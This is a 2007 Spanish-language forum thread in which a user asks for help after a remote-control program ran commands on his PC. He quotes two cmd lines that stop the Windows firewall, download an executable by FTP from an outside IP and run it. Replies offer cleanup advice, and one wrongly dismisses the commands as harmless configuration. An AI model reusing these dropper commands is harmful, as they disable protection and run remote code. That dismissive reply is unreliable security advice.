Foros del Web » Administración de Sistemas » Seguridad y redes »

Sospechas

Estas en el tema de Sospechas en el foro de Seguridad y redes en Foros del Web. Hola, instale un programa de control remoto de pc, y hubo un momento que se me abrio la ventana de comandos y se escribio solo ...
  #1 (permalink)  
Antiguo 15/04/2007, 18:00
Avatar de Jeremias  
Fecha de Ingreso: agosto-2003
Ubicación: Caracas
Mensajes: 504
Antigüedad: 20 años, 9 meses
Puntos: 0
Sospechas

Hola, instale un programa de control remoto de pc, y hubo un momento que se me abrio la ventana de comandos y se escribio solo el siguiente texto, es como si alguien hubiera entrado en mi maquina por el programa que instale,
OJO donde salga IP-A y IP-B son 2 IP que apárecieron ahi y no pondre por razones de seguridad, porque creo que una de esas ip es la mia.

Cita:
%systemroot%\system32\cmd.exe

cmd /c net stop SharedAccess &echo open IP-A >> ij &echo user a b >> ij &echo get ak.exe >> ij &echo bye >> ij &ftp -n -v -s:ij &del ij &ak.exe &net start SharedAccess &exit

%systemroot%\system32\cmd.exe

cmd /c net stop SharedAccess &echo open IP-B 54765 >> ij &echo user a b >> ij &echo get vm.exe >> ij &echo bye >> ij &ftp -n -v -s:ij &del ij &vm.exe &net start SharedAccess &exit
Bueno se poco de redes y esto, pero pareciera que por ese programa que instale alguien logro entrar y ejecutar aljun ejecutable pero en verdad no entiendo mucho esas lineas ahi

¿lguien me puede ayudar?
gracias
__________________
Atte. Jere
Agradezco su pronta colaboración.
;-) :arriba:Hoy por mi, mañana por ti:arriba: ;-)
  #2 (permalink)  
Antiguo 15/04/2007, 21:45
Avatar de orion_ap  
Fecha de Ingreso: febrero-2007
Mensajes: 55
Antigüedad: 17 años, 2 meses
Puntos: 0
Exclamación Re: Sospechas

hola.....
bueno lo primero que debes hacer es deisntalar lo que instalaste luesgo limpiar el registro con el RegSeeker -Manual hazta que no quede nada(la opcion de backup habilitada luego con el Ccleaner-Manual borras cookies y temporales ....

chao .... nos cuentas como te fue
  #3 (permalink)  
Antiguo 22/04/2007, 01:03
Avatar de mrbs  
Fecha de Ingreso: noviembre-2003
Ubicación: Monterrey
Mensajes: 85
Antigüedad: 20 años, 5 meses
Puntos: 0
Re: Sospechas

mmmmmmmmm ......... kreo ke aki en este tipo de casos es mejor prevenir que lamentar ....... internet ya no es tan seguro como hace 10 años y cada dia surgen amenazas mas y mas novedosas, desconocemos que se hizo en tu equipo y kreo ke tu tambien y pues tal parece ke se descargo una aplicacion y se ejecuto, pero bueno mira oremos pk no aia obtenido informacion personal, tarjetas y esas cosas .......... pero prevenir


un buen antivirus ...... yo recomiendo kaspersky 6, trae de todo, reviza el registro si sufrio cambios, trae una firewall y tiene buena defensa proactiva y lo puedes encontrar en español ....

y ahora ya es impresindible un antispyware, hay muchos pero el ad-aware en lo personal se me hace muy sencillo. y por favor no esta demas pasar por windows update si usas M$ Windows

Lee este tema==> Mejoremos la ortografía.
__________________
Saludos Desde Monterrey. N.L.

Última edición por BrujoNic; 22/04/2007 a las 10:01
  #4 (permalink)  
Antiguo 23/04/2007, 03:21
(Desactivado)
 
Fecha de Ingreso: febrero-2005
Mensajes: 291
Antigüedad: 19 años, 2 meses
Puntos: 4
Re: Sospechas

Que programa bajaste? Parace que el programa solo te configuro unas ips en tu maquina via el comando de windows, no significa que sea un intruso, esta pantalla se ve sobre todo en PCs lentas pero todos los programas de redes casi ejecutan la ventana de windows para ejecutar comandos.
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 06:25.